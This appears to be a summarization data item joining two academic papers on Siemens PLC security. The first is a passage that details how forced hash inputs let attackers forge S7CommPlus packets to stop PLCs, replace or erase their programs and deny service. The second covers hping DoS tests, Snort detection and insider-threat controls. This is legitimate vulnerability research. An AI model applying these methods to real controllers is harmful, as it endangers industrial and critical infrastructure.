new Request i.e., every time the user presses on the "go online" button. This 20-byte array is called ServerSessionChallenge and located always in the 26th byte position of any S7 Challenge (as shown in gure 5). Fig. 5: S7 Challenge Packet - ServerSessionChallenge Array By further investigation and inserting several breakpoints at the memory address where this array is located, we found that only 16 bytes, precisely from byte 3 to byte 18 in the ServerSessionChallenge were copied and stored in another address. This nal 16 bytes block or as called challenge in [1] plays an important role in generating certain encryption bytes for the following S7 Response and the Function packets as illustrated later in the next Subsections (IV-C and IV-D). C.S7 Response Packet TheResponse packet is sent from the TIA Portal to the PLC as a response to the Challenge packet. It is quite complex and can be divided into several parts as shown in gure 7. 1)Encryption Bytes can be manipulated :Our investiga- tions to this packet showed that the Secure Hash Algorithm 256 (SHA-256) is utilized two times to generate two hashes. The inputs of the SHA-256 algorithm are generated randomly using the Application Programming Interface (API) cryptogra- phy functions, precisely the " CryptGenRandom " function, see gure 6. The two resulting hashes are then used as a part in generating speci c encryption bytes in the S7 Response packet. Figure 7 shows these bytes which are as follows: Block 1, 9-byte: located between the byte 91 and 99. Block 2, 8-byte: located between the byte 136 and 143. Block 3, 132-byte: located between the byte 168 and 299. This block is also divided into sub-blocks as follows: the rst 76-byte block of the 132-byte block (located between the byte 168 and 243), the "First Encryption" (16-byte located between the byte 244 and 259) and the "Second Encryption" (16-byte located between the byte 284 and 299). Since the three encryption blocks are generated based on the two hashes the SHA-256 introduces as outputs [1], adversaries can maliciously manipulate those blocks by manipulating the generation process of the two hashes. To this end, an attacker can use the WinDbg software to feed constant inputs to the hash function of the SHA-256 algorithm that will eventually result xed hashes rather than random ones when the "CryptGenRandom " function was used. For instance, when we feed the hash function with "0" values as inputs, the bytes representing the hashes generated by the SHA-256 algorithms remained constant in every session. This is a very serious vulnerability as an attacker can subsequently generate the three encryption blocks, craft the entire S7 Response packet and send it nally to the PLC without the need to have a TIA Portal software installed on his machine as [1] [3] assumed. Fig. 6: Generating Keys and Bytes for the First and Second Encryption One of the two hashes, precisely the " Hash 1 ", is used in a computation to generate two keys, each has 16 bytes length (we call them " Key 1 &Key 2 " for the rest of this paper). The resulting keys are then utilized in two symmetric-key encryption processes, precisely the Advanced Encryption Stan- dard (AES)-128 algorithm (called "First Encryption & Second Encryption" in [4]) as depicted in gure 8 and 9 respectively. Since the inputs of the two hashes can be manipulated, the two keys can be also manipulated by attackers. Consequently, both encryption processes in the S7 Response packet could be manipulated. In the following we explain in detail how an attacker can manipulate the "First" and "Second Encryption" processes. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:05 UTC from IEEE Xplore. Restrictions apply. Fig. 7: S7CommPlus Response Packet from TIA Portal to the PLC Fig. 8: First Encryption in the S7CommPlus Response Packet 2)First Encryption Process :Figure 8 depicts the "First Encryption" algorithm that the Response packet implements. As can be seen, the output of this encryption is placed between the byte 77 and byte 93 of the "block 3" (the 132-byte block in the S7 Response packet) and has a 16-byte length, see gure 7. Our analysis showed that the "First Encryption" process uses two inputs: 1) the bytes located between byte 61 and 76 (in the "block 3") as a plaintext, 2) an encryption key, precisely " Key 1". Afterwards, the output of the encryption process, which is a 16-byte block, will be XOR-ed with the 16-byte challenge array. The resulting output of the XOR operation is nally stored in a certain address before it is sent to the PLC. For all that, we can conclude that the "First Encryption" process is an XOR process of a xed 16-byte with the challenge array. Therefore, to manipulate this encryption, an attackeronly needs to manipulate the hashes used to generate the " Key 1" as mentioned earlier in IV-C1. 3)Second Encryption Process :The algorithm here is similar to the one used in the former encryption process ("First Encryption") i.e., AES-128, but it differs in that the plaintext in the "Second Encryption" is produced by a sophisticated algorithm that utilizes the 16-byte output of the "First En- cryption" as a part of the inputs in the "Second Encryption". Figure 9 depicts the complete algorithm used in this encryption process. As can be seen, the "Second Encryption" contains a four-stage "Plaintext Generation" fed with ve inputs which are as follows: 1) a value with 16 bytes length, 2) the "First En- cryption" output, 3) a 16-byte ciphertext, 4) a 8-byte ciphertext value diminished from another ciphertext and 5) a 4-byte value generated by counter and padded with "0". Our investigations showed that the two hashes, we already identi ed in IV-C1, are Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:05 UTC from IEEE Xplore. Restrictions apply. Fig. 9: Second Encryption in the S7CommPlus Response Packet involved in the inputs of the "Second Encryption", except the 16-byte output of the "First Encryption". Furthermore, each stage of generating plaintexts is an XOR operation of two inputs and the result of each is fed as input to the next plaintext generation as depicted in gure 9. Once the last plaintext is produced, its value is then encrypted with the help of the " Key 2 " using a similar algorithm to the "First Encryption" algorithm. The output of the encryption algorithm is nally placed in the last 16 bytes of the "block 3" in the S7 Response packet, see gure 7. D.S7 Function Packet Once the encryption processes (in the Response packet) are calculated, the PLC approves the connection with the TIA Portal when everything is correct. Afterwards, S7 Function packets containing required data/operations will be sent from the TIA Portal (see Section III). Figure 10 shows one of these packets which contains control information. Fig. 10: S7 Function Packet from the TIA Portal Each Function packet contains a 32-byte encryption block called Integrity Part (as named in [4]) before the payload. Ouranalysis to the Integrity Part shows that this block is a Hash- based Message Authentication Code (HMAC) to examine the integrity of the Function packet. This examination aims at ensuring that the payload has not been maliciously modi ed, and authenticating the TIA Portal as the encryption keys used in the HMACs are only known by the connected parties in an ongoing S7 session. To calculate the Integrity Part block, two HMAC algorithms are called. The "First HMAC" is called to create an encryption key that is used in all further HMACs, while the "Second HMAC" is called to digitally ngerprint all the following Function packets. These two HMACs are designed based on the same hashing algorithm as follows. 1)First HMAC :The rst HMAC is called prior to sending the S7 Response packet from the TIA Portal to the PLC. The plaintext here consists of an 8-byte value (generated by a very speci c algorithm that is critical to the S7 integrity check [1]) and the 16-byte challenge array, see gure 11. The collective value is 24 bytes and digitally signed using an encryption key (also 24 bytes) produced with the help of the two hashes identi ed earlier in IV-C1. The output of the rst HMAC is a 32-byte value but it is diminished to only a 24-byte value that is eventually saved and utilized as an essential key in the "Second HMAC" computation. 2)Second HMAC :It is the actual algorithm that calculates the 32-byte Integrity Part . Please note that the length of the S7Function packet varies signi cantly based on the purpose of the packet. However, the HMAC output (32 bytes) starts always at byte 5 of any Function packet, see gure 11. The "Second HMAC" takes all the bytes after the 32-byte Integrity Part as an input i.e., starting from the byte 38, eliminating the packet s footer which is usually the last six bytes e.g., in the packet shown in gure 11 these six bytes are " 00 00 72 03 00 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:05 UTC from IEEE Xplore. Restrictions apply. Fig. 11: Integrity Part Encryption Process 00" at the end of the packet). Since the length of each Function packet and its payload can vary, the footer also varies from aFunction packet to another. However, since attackers are familiar with the key generation process, a simple trail-error method could easily determine which bytes are used as input in the second HMAC computation. V.ATTACK SCENARIOS In Section IV, we analyzed the packets exchanged over the S7CommPlusV3 protocol and found that manipulating the inputs of the SHA-256 will result constant hashes which eventually allows attackers to generate the three encryption blocks in the Response packet, as well as the Integrity Part in the Function packet. This vulnerability is quite severe and exploiting cryptographically-protected PLCs is feasible. In the following, we present potential attacks can be conducted based on crafting S7 Function packets. All the crafted packets used to conduct our attacks were built and sent from the attacker machine to the PLC using the Scapy library. Please note that establishing an S7 session with the PLC is out of the scope of this paper and already illustrated in our former paper [2]. A.Unauthorized Start/Stop Attack To start/stop a PLC, The TIA Portal sends an S7 Function packet that implements a " SetVariable " attribute on the " Na- tiveObject.theCPUexeUnit_Rid " object, see gure 12. This packet contains a 32-byte Integrity Part ("Packet Di- gest" in gure 12) that is checked by the PLC, and only if this block is computed correctly, the PLC veri es the packet and then executes the Start/Stop command. For all this, the attacker needs to craft this S7 Function packet by maliciously generating the "Key 1 & Key 2", and computing the HMACs implemented in this block (as explained in Section IV-C and IV-D). Please note that the Integrity Part bytes can be correctly calculated. This holds true for any crafted packet due to thefact that the encryption keys and required bytes (see gure 6) will be always xed, since the attacker manipulates the two hashes by introducing "0" inputs to the SHA-256 algorithm. Fig. 12: Start/Stop S7CommPlus Function Packet B.Unauthorized Software Changes to the PLC Program The user chooses the "Software Changes" option in the TIA Portal to update (download) the PLC program into the PLC. Our experiments showed that it is possible to craft the S7Function packet containing the control logic program sent to the PLC. To this end, we open the TIA Portal software and create a completely new project. Then we program the main Organization Block (OB1) with a malicious program on our will. Afterwards we download this program to the PLC and capture the S7 Function packets that are in charge of the download process. By extracting the payload parts of the captured S7 Function packets i.e., the bytes after the Integrity Part until the last six bytes of the packet " 00 00 72 03 00 00", and using this payload in our crafted S7 Function packet, we can successfully update the program running in the PLC that will only check the Integrity Part block not the malicious payload. C.Removing the PLC Program This attack scenario is quite similar to the former one (V-B), but here the attacker aims at deleting the program (OB1 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:05 UTC from IEEE Xplore. Restrictions apply. block) from the PLC s memory. An interesting fact is that the TIA Portal does not provide a "Delete" operation to the user. Therefore, the only way to delete the current program running in the target PLC is to replace the OB1 with an empty one. To do so, we create a new project in the TIA Portal, and leave the OB1 empty without any instructions. Then, we download the empty OB1 (using "Software Changes" operation) to the remote PLC. Meanwhile, we open the Wireshark and capture all the network packets exchanged between the parties which eventually contain the certain S7 Function packets the TIA Portal sends to download the empty OB1. Similar to the former attack scenario (V-B), by extracting the payload from the captured Function packets, and using this payload in our crafted S7 Function packet (after calculating a new Integrity Part and adjusting the sequence number as well as the response bytes appropriately), we can send the malicious S7 packets to the PLC which will replace the OB1 with an empty one, and the infected PLC will have no more instructions to execute. D.Unauthorized Hardware Changes to the PLC Program Attackers can maliciously alter the hardware con guration causing a non-con gured PLC state (unidenti ed station), and the TIA Portal software will not be able to establish a connection with the infected PLC. To conduct such an attack scenario, we rst create a new project on the TIA Portal, inserting a new device (PLC) to the project, and con gure the settings of this device different than the settings of the target PLC e.g., a different PLC rmware or IP address. After that, we save the project and download the new con guration to the connected CPU by utilizing the option "Hardware and Software (only changes)". Meanwhile, we capture the packets transferred between the stations and extract the S7 Function packets sent from the TIA Portal to make the required changes on the remote PLC. By using the payload of the captured pack- ets in new crafted packets, an attacker can make unauthorized hardware con guration to the PLC that will change its settings causing abnormal behaviors e.g., the PLC will not turn into run mode since it has a false con guration, or it has a new IP address so it will close all the connections with other devices and shows a synchronizing program message before the user attempts to download his own program. E.Denial of Service Knowing the encryption algorithms (i.e., "First Encryption", "Second Encryption" and HMACs) allows attackers to not only manipulate the operations provided via TIA Portal software but also to perform a DoS attack and to deprive the user of accessing the PLC. To this end, attackers can send crafted packets aiming at only establishing a new S7 session with the PLC, keeping this session alive "forever" by sending " S7- ACK " packets regularly as introduced in [2], [6]. This attack scenario is feasible due to two facts. First, S7 PLCs cannot initiate a new S7 session while there is already an ongoing session. Secondly, the " S7-ACK " packet lacks the 32-byte Integrity Part and can be reproduced "as-is" to keep an S7 session alive. Assuming that the TIA Portal is not connected tothe PLC, an attacker placed on the same network can establish a connection with the PLC [1] [3] and exchange Connection Oriented Transport Protocol (COTP) packets. After the PLC sends the Challenge packet, an attacker can respond with a crafted Response packet containing the appropriate encryption bytes, and right after that he follows his Response packet with endless-loop of S7-ACK packets. This will prevent any connection from the legitimate TIA Portal, and the attacker session will remain alive without the need of doing any further actions. Please note that the PLC will keep running the currently existing program, and it is not possible to make any software or hardware changes in the PLC. Therefore, a manual reboot is required to close the attacker session. VI. CONCLUSION AND FUTURE WORK This paper shows that the encryption processes used by the S7CommPlus protocol to protect the communication pro- cess are vulnerable. Motivated adversaries can maliciously introduce constant inputs e.g., "0" values to the SHA-256 algorithm that generates randomly the keys and bytes needed to calculate the three encryption blocks in S7 Response packets, and HMAC computations in S7 Function packets. Our experiments proved that attackers can craft their own S7Function packets and use them in replay attacks to cause several impacts on target PLCs. Based on our ndings, we managed successfully to perform a series of attacks against a real hardware cryptograpgically-protected PLC from 1500 family to validate our results. This work is done on an assumption that the target PLC is not password protected. In the future, we will try to solve this assumption by investigating the S7 authentication protocol that cryptographically protected PLCs use. We believe that such a protocol has also anti-replay mechanism and the password itself is also somehow encrypted. Thus, a further investigation is needed to cover this topic.
Summary:
S7 protocol de nes an appropriate format for ex- changing messages between SIMATIC S7 PLCs and their corre- sponding engineering software i.e., TIA Portal. Recently, Siemens has provided its newer PLC models and their proprietary S7 protocols with a very developed and sophisticated integrity check mechanism to protect them from various exploits e.g., replay attacks. This paper addresses exactly this point, and investigates the security of the most developed integrity check mechanism that the newest S7CommPlus protocol version implements. Our results showed that the latest S7 PLC models as well as their related protocols are still vulnerable. We found that adversaries can manipulate two hashes that play a signi cant role in gener- ating keys and bytes for the encryption processes implemented in the S7CommPlus protocol. This allows to reproduce S7 packets and conduct several attacks that eventually impact the operation of the target PLC and the entire physical process it controls. To validate our ndings, we test all the attack scenarios presented in this work on a cryptographically protected S7 PLC from the 1500 family which uses the S7CommPlusV3 protocol.
|
Summarize:
Index Terms -- Denial of service, indu strial control systems, insider attacks, PLC security, vulnerability analysis. I. INTRODUCTION Industrial Control Systems (ICS); are used in the management and maintenance of critical infrastructures, which are usually geographically distributed, such as gas, water, production, transportation and power distribution systems. Most of the ICS consist of several sub-components, such as Programmable Logic Controller (PLC), Human Machine Interface (HMI), Master Terminal Unit (MTU) and Remote Terminal Unit (RTU) [1]. However, in old generation ICS, private internal networks which were independent from the external networks were used for communication of these components. In order to control and monitor geographically distributed structure and to increase productivity and efficiency, Internet or intranet connection was required in ICS [2-4]. Along with this process, new vulnerabilities that could not be identified beforehand have emerged. These vulnerabilities are; Generally using open system source codes, Permitting remote access (VPN, etc.), Beyond security, ICS have a design that primarily focuses on the effectiveness of the system, such as critical timing needs, tight performance definitions, and task priorities, Not using security systems that should be used to protect ICS from other networks or from threats that may arise from the network because of commercial concerns, Not controlling privileged accounts of authorized IT staff, Not changing default usernames and passwords and therefore leaving backdoors, Using communication protocols developed for commercial purposes that security is not considered at all or rarely handled [5]. ICS are responsible for controlling and monitoring many critical infrastructures. For this reason, security vulnerabilities in systems under control, the entire infrastructure can become ICS cause these systems to become potential targets for attackers. If the attackers deactivate these systems, this may result not only in economic harm but also in the fact that citizens cannot receive important services in their lives [6]. Thus, it is crucial to analyze in depth to reveal existing vulnerabilities of components (PLC, HMI, RTU, MTU, etc.) and the protocols (ModBUS, Profinet, DNP3, etc.) used in ICS [7]. It will only be possible to take precautions against these vulnerabilities and prevent them from being exploited again by the attackers [8-10]. Vulnerabilities in ICS can cause intruders to infiltrate the network, gain access to control software, and lead to undesired major damages with changing the operating conditions of the system. DoS attacks are the types of attacks that can eventually be noticed by the vi ctims. However, it is important to detect these attacks as soon as possible, without hampering the use of services or creating a flood impact [11]. While DoS attacks seem often less dangerous than other attacks, they can become more dangerous in some cases for ICS and for critical infrastructures these systems manage. For example, in the event of preventing to close the gate of a dam in an urgent occasion or disabling the systems that control the temperature, such as in nuclear power plants, the denial of service attack can lead to major disasters. ICS are an integral component of the production and control process. The management of the majority of modern infrastructures is based on these systems. However, when they are evaluated in terms of cyber security, it is seen that the PLCs, which are important components of ICS, are in an open architecture to external networks and especially internet based constructions. Despite the security breaches in ICS, until recently, there has not been enough interest and study in the scientific area of the securi ty of PLC-managed automation systems. Only after the detection of Stuxnet malware in 2010, researches to identif y security vulnerabilities in PLC-based systems have begun to attract interest of PLC suppliers and users. Subsequent virus findings such as DuQu, Flame / sKyWIper, Night Dragon, Shamoon, Havex and Sandworm / Black Energy 2 also indicate the presence of an increasing tendency in critical infrastruc ture attacks. Despite these 2018 6th International Istanbul Smart Grids and Cities Congress and Fair (ICSG) 81 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:37 UTC from IEEE Xplore. Restrictions apply. events, security awareness of ICS environments is still not a top priority in many institutions [12]. Because the security objectives for ICS are based on accessibility, integrity and confidentiality, respectively [13,14]. In this context, the test environment (Testbed) was established to determine how to bypass the security precautions of the PLC, which is a significant component of ICS, by exploiting the security vulnerabilities of hybrid ICS protocols (Profinet-TCP/IP, etc.). In the test environment, the vulnerabilities of PLCs were evaluated through Denial of Service (DoS) attacks. Subsequently attacked packets were captured and analyzed in order to obtain the patterns of the attacks. Furthermore, the importance of managing privileged accounts for cyber attacks against ICS and the effects of insiders with these accounts were discussed. In this respect, it is aimed to rescue ICS from attacks with minimal damage and to prevent from similar attacks. Some of the studies on the security of ICS have focused on analysis based on simulation systems [14-17]. The weakest points of studies based on simulation systems are the difficulty of accurately projecting the real system and the possibility that the analyzes may not give the same results in the real system. Another part of the studies carri ed out within the scope of the security of ICS focus on confidentiality [18,19]. Solutions proposed above are usually based on cryptographic techniques. However, given the fact that today's ICS networks cover hundreds of installations with millions of equipment, the difficulty of implementing these solutions in practice can be better understood. II. T ESTBED In the majority of researches on the security of ICS, no implementation has been done to a real system. Thus, this study focuses on the detection of the vulnerabilities of the PLC device and TIA Portal app lication and the identification of the solution proposals by carrying out security analysis on a testbed where a real control system is involved. Figure 1. DoS attack reconnaissance, attack and detection steps for PLCs As shown in Fig. 1, the analysis of the DoS attack carried out on PLC and TIA Portal applications consist of three phases. At first phase, attacks were carried out and the effects on the system were evaluated. The second phase is the observation phase, which is based on the analysis of captured packets as a result of attacks. In the last stage, it was aimed to create patterns related to attack via intrusion detection systems for detecting similar attacks. The testbed consisted of one S-7 1200 (2.2 firmware) PLC hardware, one management computer on which remote command and control of the PLC was performed with TIA Portal management software, and a personal computer with Kali Linux operating system for implementing attacks. A separate computer with SmoothSec installed was used to detect the attacks. DoS attacks were carried out on PLCs and TIA Portal application in the network topology shown in Fig. 2 by using Hping, SmootSec IDS and Wireshark tools. Figure 2. Testbed network topology III. DENIAL OF SERVICE ATTACK (DOS) One of the important threat to ICS is Denial of Service attack. The aim of Denial of Service attack is to block the system to access to authorized resources or preventing to use these resources in its intended manner [20,21]. Figure 3. DoS attack reconnaissance, attack and detection phases 2018 6th International Istanbul Smart Grids and Cities Congress and Fair (ICSG) 82 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:37 UTC from IEEE Xplore. Restrictions apply. In the analysis of the attack, Service Denial attack was carried out first, and the changes in the system were examined. Subsequently the rule sets crea ted by analyzing the captured attack packets according to the ph ases indicated in Fig. 3 were entered into the Snort based library. Detecting attacks, the ultimate goal, was achieved through these rules. PLC protocols responds to all query packets from any IP / MAC address or node points and this situation is also another important vulnerability in PLCs. It is determined that DoS attack can be carried out su ccessfully even if it is in a different network as long as the IP address of the target is detected, because DoS attack is a kind of directly IP-oriented attack. Any port scan tool like Nmap tool can be used for detecting the IP address of a PLC. In this respect, DoS attack was carried out to the PROFINET port (102) which is used mostly by PLC devices for network communication. Hping program was used for DoS attack and as long as the attack continued, the ping response time of the PLC device increased considerably. When the DoS attack was stopped, the ping response time measured as 1212 ms as shown in Fig. 4. Figure 4. DoS attack effects on PLC The DoS attack was also carried out to the TIA Portal, the control computer. As long as the attack continued, ping response time increased from about 2ms to 5280 ms. Additionally, all of the control buttons of the TIA Portal became inactive and the PLC could not be controlled via the TIA Portal as shown in Fig. 5. Figure 5. TIA Portal management screen after DoS attack DoS attack packets carried out on PLC were detected as medium severity spam as shown in Fig. 6. Figure 6. Event packets detected after DoS attack Despite the attack was carried out with a few attacker computers, it was detected that network became ineffective. According to the delay standard of the IEEE 1646-2004 The Automation Communication of Substations, high-speed messages must be transmitted between 2 ms and 10 ms [22]. In this context, when the needs of instant reaction of PLC is considered, latency occurs in the network traffic of the control systems due to DoS attack may lead to significant problems. It is easy to detect IP address of attacker when DoS attack is carried out from a single source. However, it is more difficult to detect DoS attacks from different IP addresses by performing IP spoofing. Thus, attackers use IP spoofing method to hide the IP addresses and uses bogon IP adresses such as the attack scenario handled in this paper (Fig. 7). Figure 7. Source IP addresses of DDoS attack packets When the rule information of a listed event shown in Fig. 6 is examined, it can be understood that event packets are the distributed denial of service (DDoS) attack packets described in Fig. 8. Figure 8. The signature acquired after DoS attack 2018 6th International Istanbul Smart Grids and Cities Congress and Fair (ICSG) 83 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:37 UTC from IEEE Xplore. Restrictions apply. IV. ANALYSIS RESULT In the vulnerability analysis DoS attacks were carried out on PLC, one of the most important component of ICS, and results of attacks indicated that PLCs were vulnerable to these attacks. The detection phase of attack analysis results have shown that needed precautions for possible attacks can be taken by monitoring the PLC communication traffic continuously. Although, signature based prevention systems (antivirus, IPS, etc.) are believed to have a great success against the known cyber attack, they are not effective enough against new malicious payloads emerging in every second, especially the zero day vulnerabilities. For this reason, adjusting network traffic norms and thresholds with continuous monitoring provides constituting attack patterns for alerting network administrators / security experts. Thus, it will be possible to prevent malicious packets from infiltrating and harming the system, while ensuring that the legal packets are not delayed and prevented in the context of the continuity dimension of ICS. When the phases of the attacks in the testbed are examined, it is understood that the network topology and the determination of the target are vital factors for implementing successful attacks. However, in the event that the attacker is an insider within the organization and has privileged authorization over ICS systems, the success rate and destructive effects of the attack will increase. For this reason, it is very important to monitor the operations performed by employees with privileged authorization on ICS and to regulate their authority. V. I NSIDERS EFFECTS AND SOLUTION SUGGESTIONS Some studies investigating the causes of information security threats suggest that careless or malicious personnel with Access authorization are more hazardous and destructive than hackers, malicious software and troubled hardware [23,24]. In other studies, it is estimated that the abuse of privileged accounts is at high risk during insider attacks and this kind of attacks will increase in the coming period [25, 26]. Such risks are also prevalent for ICS and if the necessary security measures are not taken for insider threat, the effects for ICS will be much more devastating. Because, the detection and prevention of an at tack will be so difficu lt in the event that an insider has the knowledge of the network topology and components of the ICS. Protection from insider attacks requires specific solutions. However, when organizations' cyber security solutions are examined, it appears that most of them focus on external threats [27]. Security solutions to be used for internal and external threats should not be considered separately on the contrary they should be carried out in an integrated manner [28]. In order to prevent internal threats, not only technological solutions but also human factors should be evaluated. In addition to ordinary user accounts, ICS also has administrator accounts that are owned by IT staff with privileged authorization within the system. These accounts are mostly used for management, maintenance and repair of systems. One of the goals of the attackers to achieve their ultimate goal is the privileged accounts and their passwords used in the system. The seizure of one of these account's password by the attackers can cause the whole system to be seized. The Maroochy Water Service Breach incident, one of the attacks on ICS implemented by the insiders, was derived from the fact that the user account of a discarded employee was not removed from authorized accounts [29]. Ukrainian Power Grid Attack also was stemmed from careless and untrained users. Attackers gained privileged accounts from these users and causing about 225,000 people to be affected. Stuxnet is one of the most well-known target driven attack carried out on ICS. Although it is not known ex actly how this attack was carried out, majority of the rese archers think that the attackers got help from an insider for carrying out such a complicated attack. The main reason of this opinion is that ICS, the target of the attack, have an air gap structure isolated from the outside [30]. The control and management of privileged accounts, one of the most important causes of ICS attacks, is an important information security issue that needs to be assessed. Many measures and procedures have been proposed by researchers to solve this problem. Although the objectives of the solutions proposed by the researchers are the same, they involve different approaches [31-34]. A control mechanism should be developed on the basis of the issues discussed above to prevent exploitation of privileged accounts during insider attacks. The developed control mechanism should involve; Prevention unauthorized access to components of the ICS Increasing ICS resistance to password attacks Training and expanding awareness of staff on cyber security Regulation of access control to ICS components Keeping logs to follow up transactions performed by authorized personnel Clearly defining the limits of re sponsibility within the ICS Ensuring to include organizational managers in the IT security process. Figure 9. The position of control mechanism within ICS 2018 6th International Istanbul Smart Grids and Cities Congress and Fair (ICSG) 84 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:37 UTC from IEEE Xplore. Restrictions apply. The control mechanism to be established in accordance with the specified points should run integrated with ICS. The control mechanism must be located between the ICS and the authorized personnel as an additional layer of security in accessing the components of the ICS infrastructure (Fig. 9). VI. C ONCLUSION Many critical infrastructures managed by ICS do not have adequate security assessment against cyber attacks. These critical systems can face many threats, unless the security vulnerabilities of the ICS are determined and the necessary measures are taken to overcome them. In this context, critical ICS components need to be monitored in real time so that ICS, which significantly affect our social lives, can survive with minimal damage from potential cyber threats and can be activated as soon as possible. As a result of analysis, it has been seen that detection based solutions including continuous quality monitoring and behavior based testing are more effective than security measures based on preventing due to new malware emerging every second. Furthermore, organizations with critical infrastructure to prevent Insider attacks should develop and implement a control mechanis m for staff with privileged authority over ICS and other employees. The operations on ICS of all employees who are likely to become an insider should be monitored and recorded. It should not be forgotten that attacks aimed ICS may carry out not only from outside but also from a trusted staff with privileged account. R EFERENCES [1] H. Farhangi, "The path of the smart grid," IEEE Power and Energy Magazine, vol. 8, no. 1, pp. 18-28, Dec. 2010. [2] P. Motta Pires and L. H.g. Oliveira, "Security Aspects of SCADA and Corporate Network Interconnection: An Overview," in Proc. 2006 Int. Conf. on Dependability of Computer Systems , pp. 127-134. [3] V. M. Igure, S. A. Laughter, and R. D. Williams, "Security issues in SCADA networks," Computers & Security, vol. 25, no. 7, pp. 498-506, Oct. 2006. [4] M. Hentea, "Improving Security for SCADA Control Systems," Interdisciplinary Journal of Information, Knowledge, and Management, vol. 3, pp. 073-086, 2008. [5] S. Rautmare, "SCADA system security: Challenges and recommendations," in Proc. 2011 Annual IEEE India Conf. , pp. 1-4. [6] S. Clements and H. Kirkham, "Cyber-security considerations for the smart grid," in Proc. 2010 IEEE PES General Meeting , pp. 1-5. [7] R. E. Johnson, "Survey of SCADA security challenges and potential attack vectors," in Proc. 2010 Int. Conf. for Internet Technology and Secured Transactions , pp. 1-5. [8] A. Nicholson, S. Webber, S. Dyer, T. Patel, and H. Janicke, "SCADA security in the light of Cyber-Warfare," Comput. Secur., vol. 31, no. 4, pp. 418-436, June 2012. [9] G. P. H. Sandaruwan, P. S. Ranaweera, and V. A. Oleshchuk, "PLC security and critical infrastructure protection," in Proc. 2013 IEEE 8th Int. Conf. on Industrial and Information Systems , pp. 81-85. [10] M. Jensen, C. Sel, U. Franke, H. Holm, and L. Nordstr m, "Availability of a SCADA/OMS/DMS system - A case study," in Proc. 2010 IEEE PES Innovative Smart Grid Technologies Conf. Europe , pp. 1-8. [11] T. Peng, C. Leckie, and K. Ramamohanarao, "Survey of network-based defense mechanisms countering the DoS and DDoS problems," ACM Comput. Surv., vol. 39, no. 1, pp. 1-42, Apr. 2007 2007, Art. no. 3. [12] E. Byres, "Defense-In-Depth: Reliable Security To Thwart Cyber- Attacks," Pipeline & Gas Journal, vol. 241, no. 2, Feb. 2014. [13] D. Kushner, "The real story of stuxnet," IEEE Spectrum, vol. 50, no. 3, pp. 48-53, Mar. 2013. [14] E. Byres, D. Hoffman, and N. Kube, "On Shaky Ground A Study of Security Vulnerabilities in Control Protocols," in Proc. 2006 5th Int. Topical Meeting on Nuclear Plant Instrumentation, Controls, and Human Machine Interface Technology vol. 1, pp. 782-788. [15] A. Giani, G. Karsai, T. Roosta, A. Shah, B. Sinopoli, and J. Wiley, "A testbed for secure and robust SCADA systems," SIGBED Rev., vol. 5, no. 2, pp. 1-4, July 2008. [16] B. Genge, F. Graur, and P. Haller, "Experimental assessment of network design approaches for protecting industrial control systems," Int. Journal of Critical Infrastructure Protection, vol. 11, pp. 24-38, Dec. 2015. [17] N. Sayegh, A. Chehab, I. H. Elhajj, and A. Kayssi, "Internal security attacks on SCADA systems," in Proc. 2013 3rd Int. Conf. on Communications and Information Technology , pp. 22-27. [18] H. Li, R. Mao, L. Lai, and R. C. Qiu, "Compressed Meter Reading for Delay-Sensitive and Secure Load Report in Smart Grid," in Proc. 2010 First IEEE Int. Conf. on Smart Grid Communications , pp. 114-119. [19] E. Shi, A. Perrig, and L. V. Doorn, "BIND: a fine-grained attestation service for secure distributed systems," in Proc. 2005 IEEE S y mposium on Security and Privacy , pp. 154-168. [20] A. Silberschatz, P. B. Galvin, and G. Gagne, "Security," in Operating System Concepts , 9th ed., Hoboken, NJ: John Wiley & Sons, 2013, pp. 673-674. [21] P. Varalakshmi and S. T. Selvi, "Thwarting DDoS attacks in grid using information divergence," Future Generation Computer Systems, vol. 29, no. 1, pp. 429-441, Jan. 2013. [22] K. C. Budka, J. G. Deshpande, T. L. Doumi, M. Madden, and T. Mew, "Communication network architecture and design principles for smart grids," Bell Lab. Tech. J., vol. 15, no. 2, pp. 205-227, Sep. 2010. [23] J. Shropshire, M. Warkentin, and S. Sharma, "Personality, attitudes, and intentions: Predicting initial adoption of information security behavior," Computers & Security, vol. 49, pp. 177-191, Mar. 2015. [24] M. Leitner and S. Rinderle-Ma, "A systematic review on security in Process-Aware Information Systems-Constitution,challenges, and future directions," Inf. Softw. Technol., vol. 56, no. 3, pp. 273-293, Mar. 2014. [25] R. Pilling, "Global threats, cyber-security nightmares and how to protect against them," Computer Fraud & Security, vol. 2013, no. 9, pp. 14-18, Sep. 2013. [ 2 6 ] W . R . C l a y c o m b , C . L . H u t h , L . F l y n n , D . M . M c I n t i r e , a n d T . B . Lewellen, "Chronological Examination of Insider Threat Sabotage: Preliminary Observations," Journal of Wireless Mobile Networks, Ubiquitous Computing, and Dependable Applications (JoWUA), vol. 3, no. 4, pp. 4-20, Dec. 2012. [27] T. El Maliki and J.-M. Seigneur, "A Survey of User-centric Identity Management Technologies," in Proc. 2007 Int. Conf. Emerging Security Information, Systems, and Technologies , pp. 12-17. [28] S. De Capitani di Vimercati, S. Paraboschi, and P. Samarati, "Access control: principles and solutions," Software: Practice and Experience, vol. 33, no. 5, pp. 397-421, Apr. 2003. [29] J. Slay and M. Miller, "Lessons Learned from the Maroochy Water Breach," in Critical Infrastructure Protection , Boston,MA: Springer, 2008, pp. 73-82. [30] R. M. Lee and M. J. Assante. (2015, Oct. 15). The Industrial Control System Cyber Kill. SANS Institute . [Online]. Available: https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297 [31] K. Padayachee, "An assessment of opportunity-reducing techniques in information security: An insider threat perspective," Decision Support Systems, vol. 92, pp. 47-56, Dec. 2016. [32] N. Baracaldo and J. Joshi, "An adaptive risk management and access control framework to mitigate insider threats," Computers & Security, vol. 39, pp. 237-254, Nov. 2013. [33] I. Agrafiotis, J. R. C. Nurse, O. Buckley, P. Legg, S. Creese, and M. Goldsmith, "Identifying attack patterns for insider threat detection," Computer Fraud & Security, 